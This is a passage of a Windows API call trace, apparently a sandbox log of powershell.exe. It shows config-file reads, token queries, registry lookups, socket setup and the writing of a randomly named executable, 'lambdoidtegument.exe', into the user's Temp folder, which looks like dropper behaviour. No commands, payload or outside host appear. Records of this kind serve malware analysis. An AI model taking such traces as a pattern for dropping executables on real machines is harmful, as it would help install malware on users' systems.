(in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.133] GetLastError () returned 0xcb [0054.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.135] GetLastError () returned 0xcb [0054.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.145] GetLastError () returned 0xcb [0054.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.147] GetLastError () returned 0xcb [0054.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.148] GetLastError () returned 0xcb [0054.164] VirtualQuery (in: lpAddress=0x51ce10c, lpBuffer=0x51cf10c, dwLength=0x1c | out: lpBuffer=0x51cf10c*(BaseAddress=0x51ce000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.164] GetLastError () returned 0xcb [0054.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.166] GetLastError () returned 0xcb [0054.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.166] GetLastError () returned 0xcb [0054.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.192] GetLastError () returned 0xcb [0054.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.205] GetLastError () returned 0xcb [0054.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.254] GetLastError () returned 0xcb [0054.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.256] GetLastError () returned 0xcb [0054.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.256] GetLastError () returned 0xcb [0054.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.258] GetLastError () returned 0xcb [0054.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.258] GetLastError () returned 0xcb [0054.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.259] GetLastError () returned 0xcb [0054.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.260] GetLastError () returned 0xcb [0054.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.281] GetLastError () returned 0xcb [0054.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.308] GetLastError () returned 0xcb [0054.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x393360, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.310] GetLastError () returned 0xcb [0054.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.692] GetLastError () returned 0xcb [0054.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce618, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.692] GetLastError () returned 0xcb [0054.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x396c78, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0054.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x51ce69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0054.700] GetLastError () returned 0x0 [0054.715] GetCurrentProcess () returned 0xffffffff [0054.715] GetLastError () returned 0x3f0 [0054.715] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce7b0 | out: TokenHandle=0x51ce7b0*=0x398) returned 1 [0054.715] GetLastError () returned 0x3f0 [0054.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x51ce348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0054.720] GetLastError () returned 0x0 [0054.747] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7f0 | out: lpFileInformation=0x51ce7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0054.747] GetLastError () returned 0x0 [0054.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x51ce308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0054.749] GetLastError () returned 0x0 [0054.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7ec | out: lpFileInformation=0x51ce7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0054.749] GetLastError () returned 0x0 [0054.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x51ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0054.749] GetLastError () returned 0x0 [0054.749] SetErrorMode (uMode=0x1) returned 0x1 [0054.749] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0054.749] GetLastError () returned 0x0 [0054.749] GetFileType (hFile=0x354) returned 0x1 [0054.749] SetErrorMode (uMode=0x1) returned 0x1 [0054.749] GetFileType (hFile=0x354) returned 0x1 [0054.750] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x51ce7c0 | out: lpFileSizeHigh=0x51ce7c0*=0x0) returned 0x65b3 [0054.750] GetLastError () returned 0x0 [0054.751] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce778, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce778*=0x1000, lpOverlapped=0x0) returned 1 [0054.751] GetLastError () returned 0x0 [0054.754] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce588, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce588*=0x1000, lpOverlapped=0x0) returned 1 [0054.754] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) returned 1 [0054.755] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) returned 1 [0054.755] GetLastError () returned 0x0 [0054.755] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce430, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce430*=0x1000, lpOverlapped=0x0) returned 1 [0054.755] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce564, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce564*=0x1000, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce3f8, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce3f8*=0x5b3, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.761] ReadFile (in: hFile=0x354, lpBuffer=0x2509518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x51ce4e4, lpOverlapped=0x0 | out: lpBuffer=0x2509518*, lpNumberOfBytesRead=0x51ce4e4*=0x0, lpOverlapped=0x0) returned 1 [0054.761] GetLastError () returned 0x0 [0054.762] CloseHandle (hObject=0x354) returned 1 [0054.762] GetLastError () returned 0x0 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.764] GetLastError () returned 0x0 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce618, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.764] GetLastError () returned 0x0 [0054.764] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x396c78, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0054.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x51ce69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0054.764] GetLastError () returned 0x0 [0054.765] GetCurrentProcess () returned 0xffffffff [0054.765] GetLastError () returned 0x3f0 [0054.765] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x354) returned 1 [0054.765] GetLastError () returned 0x3f0 [0054.766] GetCurrentProcess () returned 0xffffffff [0054.766] GetLastError () returned 0x3f0 [0054.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x350) returned 1 [0054.766] GetLastError () returned 0x3f0 [0054.769] GetCurrentProcess () returned 0xffffffff [0054.769] GetLastError () returned 0x3f0 [0054.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce7b0 | out: TokenHandle=0x51ce7b0*=0x358) returned 1 [0054.769] GetLastError () returned 0x3f0 [0054.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7f0 | out: lpFileInformation=0x51ce7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.769] GetLastError () returned 0x2 [0054.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x51ce308, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0054.769] GetLastError () returned 0x2 [0054.769] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x51ce7ec | out: lpFileInformation=0x51ce7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.769] GetLastError () returned 0x2 [0054.769] GetCurrentProcess () returned 0xffffffff [0054.769] GetLastError () returned 0x3f0 [0054.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x35c) returned 1 [0054.769] GetLastError () returned 0x3f0 [0054.770] GetCurrentProcess () returned 0xffffffff [0054.770] GetLastError () returned 0x3f0 [0054.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51cea40 | out: TokenHandle=0x51cea40*=0x360) returned 1 [0054.770] GetLastError () returned 0x3f0 [0054.776] GetCurrentProcess () returned 0xffffffff [0054.776] GetLastError () returned 0x3f0 [0054.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce81c | out: TokenHandle=0x51ce81c*=0x364) returned 1 [0054.776] GetLastError () returned 0x3f0 [0054.816] GetCurrentProcess () returned 0xffffffff [0054.816] GetLastError () returned 0x3f0 [0054.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce82c | out: TokenHandle=0x51ce82c*=0x368) returned 1 [0054.816] GetLastError () returned 0x3f0 [0054.818] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce710, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0054.819] GetLastError () returned 0x3f0 [0054.819] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0054.819] GetLastError () returned 0x3f0 [0054.819] SetErrorMode (uMode=0x1) returned 0x1 [0054.819] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x388 [0054.819] GetLastError () returned 0x0 [0054.819] GetFileType (hFile=0x388) returned 0x1 [0054.819] SetErrorMode (uMode=0x1) returned 0x1 [0054.819] GetFileType (hFile=0x388) returned 0x1 [0054.820] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0054.820] GetLastError () returned 0x0 [0054.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0054.820] GetLastError () returned 0x0 [0054.833] GetCurrentProcess () returned 0xffffffff [0054.833] GetLastError () returned 0x3f0 [0054.833] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce840 | out: TokenHandle=0x51ce840*=0x3b0) returned 1 [0054.833] GetLastError () returned 0x3f0 [0054.836] GetCurrentProcess () returned 0xffffffff [0054.836] GetLastError () returned 0x3f0 [0054.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce850 | out: TokenHandle=0x51ce850*=0x3b4) returned 1 [0054.836] GetLastError () returned 0x3f0 [0054.868] GetCurrentProcess () returned 0xffffffff [0054.868] GetLastError () returned 0x3f0 [0054.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce814 | out: TokenHandle=0x51ce814*=0x3b8) returned 1 [0054.868] GetLastError () returned 0x3f0 [0054.870] GetCurrentProcess () returned 0xffffffff [0054.870] GetLastError () returned 0x3f0 [0054.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce824 | out: TokenHandle=0x51ce824*=0x3bc) returned 1 [0054.870] GetLastError () returned 0x3f0 [0054.873] GetCurrentProcess () returned 0xffffffff [0054.873] GetLastError () returned 0x3f0 [0054.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ceb18 | out: TokenHandle=0x51ceb18*=0x3c0) returned 1 [0054.873] GetLastError () returned 0x3f0 [0054.885] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x51cdb78 | out: phkResult=0x51cdb78*=0x3c4) returned 0x0 [0054.885] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x51cdbc0, lpData=0x0, lpcbData=0x51cdbbc*=0x0 | out: lpType=0x51cdbc0*=0x1, lpData=0x0, lpcbData=0x51cdbbc*=0xe) returned 0x0 [0054.885] RegQueryValueExW (in: hKey=0x3c4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x51cdbc0, lpData=0x396c78, lpcbData=0x51cdbbc*=0xe | out: lpType=0x51cdbc0*=0x1, lpData="Client", lpcbData=0x51cdbbc*=0xe) returned 0x0 [0054.886] RegCloseKey (hKey=0x3c4) returned 0x0 [0054.893] RasEnumConnectionsW (in: param_1=0x399978, param_2=0x51ceb90, param_3=0x51ceb94 | out: param_1=0x399978, param_2=0x51ceb90, param_3=0x51ceb94) returned 0x0 [0054.904] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x399978 | out: lpWSAData=0x399978) returned 0 [0054.910] GetLastError () returned 0x0 [0054.912] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0054.916] GetLastError () returned 0x0 [0054.916] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0054.916] GetLastError () returned 0x273a [0054.916] closesocket (s=0x40c) returned 0 [0054.916] GetLastError () returned 0x0 [0054.916] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x40c [0054.917] GetLastError () returned 0x0 [0054.917] setsockopt (s=0x40c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0054.917] GetLastError () returned 0x273a [0054.917] closesocket (s=0x40c) returned 0 [0054.917] GetLastError () returned 0x0 [0054.920] GetCurrentProcess () returned 0xffffffff [0054.920] GetLastError () returned 0x3f0 [0054.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce6fc | out: TokenHandle=0x51ce6fc*=0x40c) returned 1 [0054.920] GetLastError () returned 0x3f0 [0054.923] GetCurrentProcess () returned 0xffffffff [0054.923] GetLastError () returned 0x3f0 [0054.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce70c | out: TokenHandle=0x51ce70c*=0x410) returned 1 [0054.923] GetLastError () returned 0x3f0 [0054.933] GetCurrentProcessId () returned 0xb44 [0054.935] GetComputerNameW (in: lpBuffer=0x399978, nSize=0x252a560 | out: lpBuffer="F71GWAT", nSize=0x252a560) returned 1 [0054.935] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ce960 | out: phkResult=0x51ce960*=0x414) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x1, lpData=0x0, lpcbData=0x51ce9a4*=0x1c) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="Library", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x399978, lpcbData=0x51ce9a4*=0x1c | out: lpType=0x51ce9a8*=0x1, lpData="netfxperf.dll", lpcbData=0x51ce9a4*=0x1c) returned 0x0 [0054.935] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x4, lpData=0x0, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x51ce994, lpcbData=0x51ce9a4*=0x4 | out: lpType=0x51ce9a8*=0x4, lpData=0x51ce994*=0x1, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x0, lpcbData=0x51ce9a4*=0x0 | out: lpType=0x51ce9a8*=0x4, lpData=0x0, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="First Counter", lpReserved=0x0, lpType=0x51ce9a8, lpData=0x51ce994, lpcbData=0x51ce9a4*=0x4 | out: lpType=0x51ce9a8*=0x4, lpData=0x51ce994*=0x1040, lpcbData=0x51ce9a4*=0x4) returned 0x0 [0054.936] RegCloseKey (hKey=0x414) returned 0x0 [0054.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x51ce95c | out: phkResult=0x51ce95c*=0x414) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x4, lpData=0x0, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x51ce990, lpcbData=0x51ce9a0*=0x4 | out: lpType=0x51ce9a4*=0x4, lpData=0x51ce990*=0x3, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x4, lpData=0x0, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.936] RegQueryValueExW (in: hKey=0x414, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x51ce990, lpcbData=0x51ce9a0*=0x4 | out: lpType=0x51ce9a4*=0x4, lpData=0x51ce990*=0x20000, lpcbData=0x51ce9a0*=0x4) returned 0x0 [0054.937] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x0, lpcbData=0x51ce9a0*=0x0 | out: lpType=0x51ce9a4*=0x3, lpData=0x0, lpcbData=0x51ce9a0*=0xaa) returned 0x0 [0054.937] RegQueryValueExW (in: hKey=0x414, lpValueName="Counter Names", lpReserved=0x0, lpType=0x51ce9a4, lpData=0x252cc90, lpcbData=0x51ce9a0*=0xaa | out: lpType=0x51ce9a4*=0x3, lpData=0x252cc90*, lpcbData=0x51ce9a0*=0xaa) returned 0x0 [0054.938] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0054.939] GetLastError () returned 0x0 [0054.941] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x393528, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x418 [0054.941] GetLastError () returned 0x0 [0054.942] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4770000 [0054.944] VirtualQuery (in: lpAddress=0x4770000, lpBuffer=0x51ce974, dwLength=0x1c | out: lpBuffer=0x51ce974*(BaseAddress=0x4770000, AllocationBase=0x4770000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0054.944] GetLastError () returned 0x0 [0054.944] LocalFree (hMem=0x38dda0) returned 0x0 [0054.945] RegCloseKey (hKey=0x414) returned 0x0 [0054.946] GetVersionExW (in: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.946] GetLastError () returned 0x0 [0054.946] GetVersionExW (in: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x399978*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0054.946] GetLastError () returned 0x0 [0054.947] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x252d6f8, cbSid=0x51ce954 | out: pSid=0x252d6f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x51ce954) returned 1 [0054.947] GetLastError () returned 0x0 [0054.948] CreateMutexW (lpMutexAttributes=0x252d830, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x414 [0054.948] GetLastError () returned 